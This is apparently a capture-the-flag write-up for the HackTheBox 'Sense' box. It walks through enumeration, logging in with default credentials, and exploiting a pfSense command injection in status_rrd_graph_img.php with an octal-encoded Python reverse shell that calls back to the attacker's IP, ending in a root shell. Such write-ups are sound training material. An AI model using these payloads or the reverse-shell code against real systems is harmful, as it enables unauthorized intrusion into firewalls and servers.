Previous Page

nihilist - 21 / 11 / 19

Sense Writeup

Introduction :



Sense is an easy FreeBSD box that was released back in October 2017.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

  λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.60
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 13:32 CET
  Nmap scan report for 10.10.10.60
  Host is up (0.13s latency).
  Not shown: 998 filtered ports
  PORT    STATE SERVICE  VERSION
  80/tcp  open  http     lighttpd 1.4.35
  |_http-server-header: lighttpd/1.4.35
  |_http-title: Did not follow redirect to https://10.10.10.60/
  |_https-redirect: ERROR: Script execution failed (use -d to debug)
  443/tcp open  ssl/http lighttpd 1.4.35
  |_http-server-header: lighttpd/1.4.35
  |_http-title: Login
  | ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
  | Not valid before: 2017-10-14T19:21:35
  |_Not valid after:  2023-04-06T19:21:35
  |_ssl-date: TLS randomness does not represent time

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 44.03 seconds

Part 2 : Getting User Access



Our nmap scan picked up that the 80th port was opened. let's open see what lies at the corresponding URL within a web browser.

Seems like we are greeted with a pfSense login page. We are going to run a dirbusting command to enumerate the directories available on the webservice.

  λ nihilist [ 10.10.14.48/23 ] [~] → gobuster -w /usr/wordlists/directory.txt -u http://10.10.10.60/ -x php,txt,cnf,conf

Gobuster found the cmd.txt, system.txt and changelog.txt

Navigating to the system-users.txt we seem to have a username to work with. We'll test if we can log in using the default credentials rohit:pfsense

And we are logged in ! We see that the system is running FreeBSD 8.3-RELEASE-p16 with an outdated 2.1.3-RELEASE amd64 pfSense, by running a quick searchsploit command with the keywords pfsense 2.1 we see that the service may be vulnerable to Command Injections.

  λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Sense 2.1
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
pfSense 2.1 build 20130911-1816 - Directory Traversal                      | exploits/php/webapps/31263.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection             | exploits/php/webapps/43560.py
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Let's first locate the exploit n°43560 on our system and copy it to our current directory.

λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → locate 43560.py
/usr/share/exploitdb/exploits/php/webapps/43560.py

λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cp /usr/share/exploitdb/exploits/php/webapps/43560.py .

λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nano 43560.py

looking at the exploit made by absolomb, we see that the exploit is supposed to exploit a command Injection Vulnerability that can be found within the status_rrd_graph_img php file onto the pfsense webservice. We will need to pass it the --rhost , --lhost, --lport, --username, --password flags.

Part 3 : Getting Root Access



Within the exploit the main lines are the following :

payload = ""

# encode payload in octal
for char in command:
        payload += ("\\" + oct(ord(char)).lstrip("0o"))

exploit_url = "https://" + rhost + "/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

the exploit starts to browse at the url https://10.10.10.60/status_rrd_graph_img.php?database=queues; and from there starts the Command Execution Vulnerability, and we choose whatever command we need to execute. One thing to note though is that the command should be passed onto the URL with an Octal encoded string. rather than attempting to pass it as plain text, if we isolate the octal conversion part it looks like this :

λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → cat exploit.py
#!/usr/bin/env python3

command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.48',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i'];'"

payload = ""

for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))

print(payload)

λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → python exploit.py
\160\171\164\150\157\156\40\55\143\40\47\151\155\160\157\162\164\40\163\157\143\153\145\164\54\163\165\142\160\162\157\143\145\163\163\54\157\163\73\163\75\163\157\143\153\145\164\56\163\157\143\153\145\164\50\163\157\143\153\145\164\56\101\106\137\111\116\105\124\54\163\157\143\153\145\164\56\123\117\103\113\137\123\124\122\105\101\115\51\73\163\56\143\157\156\156\145\143\164\50\50\47\61\60\56\61\60\56\61\64\56\61\60\47\54\64\64\63\51\51\73\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\60\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\61\51\73\40\157\163\56\144\165\160\62\50\163\56\146\151\154\145\156\157\50\51\54\62\51\73\160\75\163\165\142\160\162\157\143\145\163\163\56\143\141\154\154\50\133\47\57\142\151\156\57\163\150\47\54\47\55\151\47\135\73\47

Now before we run the python script, we ready our terminal with the nc command with the -lvnp flags in order to catch the incoming reverse shell onto the corresponding port.

Terminal 1:
    λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Sense] → nc -lvnp 9001
  
Terminal 2:
    python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.48 --lport 9001 --username rohit --password pfsense
    CSRF token obtained
    Running exploit...
    Exploit completed
  
Terminal 1:
    λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Sense] → nc -lvnp 9001
    Connection from 10.10.10.60:34128
    sh: cant access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)
    # cat /root/root.txt
    d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    # cat /home/rohit/user.txt
    87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  

And that's it ! The exploit spawned a root shell for us, and we have been able to print both the root and the user flags.

Conclusion



Here we can see the progress graph :